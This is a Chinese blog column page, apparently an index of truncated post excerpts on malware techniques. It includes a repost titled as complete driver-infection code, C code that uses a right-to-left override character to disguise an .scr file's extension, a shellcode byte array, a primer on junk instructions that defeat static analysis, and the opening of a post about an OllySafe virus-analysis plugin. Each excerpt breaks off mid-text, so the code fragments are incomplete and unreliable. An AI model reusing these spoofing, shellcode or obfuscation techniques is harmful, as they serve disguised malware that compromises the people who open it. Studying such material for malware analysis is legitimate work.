kerson的专栏

<br />【原创】完整的驱动感染.code.编译通过  标 题: 【原创】完整的驱动感染.code.编译通过<br />作 者: sudami<br />时 间: 2008-05-28,21:59:10<br />链 接: http://bbs.pediy.com/showthread.php?t=65628<br /><br />完整的驱动感染.code.编译通过<br /><br />/* <br />* Module: InfectDriver.c <br />* <br />* Author : 

<br /> <br />#include <windows.h><br /> <br />int main(void)<br />{    <br />HANDLE hl = CreateFileW(L"JokeS/x202Egnp.scr", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);  if (hl != INVALID_HANDLE_VALUE)    CloseHandle(hl);<br /> <br />}<br />当你拿到一个r

<br /><br />int main() <br />{ <br />char shellcode[]=<br />"/xFC/x68/x6A/x0A/x38/x1E/x68/x63/x89/xD1/x4F/x68/x32/x74/x91/x0C"<br />"/x8B/xF4/x8D/x7E/xF4/x33/xDB/xB7/x04/x2B/xE3/x66/xBB/x33/x32/x53"<br />"/x68/x75/x73/x65/x72/x54/x33/xD2/x64/x8B/x5A/x30/x8

<br />花指令的原理和常用花指令收集花指令的作用是对付静态分析，以下面一段程序说明一下花指令的原理代码#include <iostream.h><br />#include <windows.h><br />void main()<br />{<br />    _asm<br />    {<br />            jmp l2<br />        _EMIT 0x1//这里就是花指令<br />        _EMIT 0x2//这里就是花指令<br />        _EM

<br />[转]病毒分析工具-OllySafe2009年03月11日 星期三 10:04<br /> 转自  作者:domino<br />原帖地址:http://www.unpack.cn/viewthread.php?tid=21146&extra=page%3D1<br />OllySafe<br /><br />一、What’s fucking this<br /><br />病毒分析工具OllySafe其实就是MiniSafe的专业版，是一个专门为病毒分析员提供的OllyDbg插件，它可以对病毒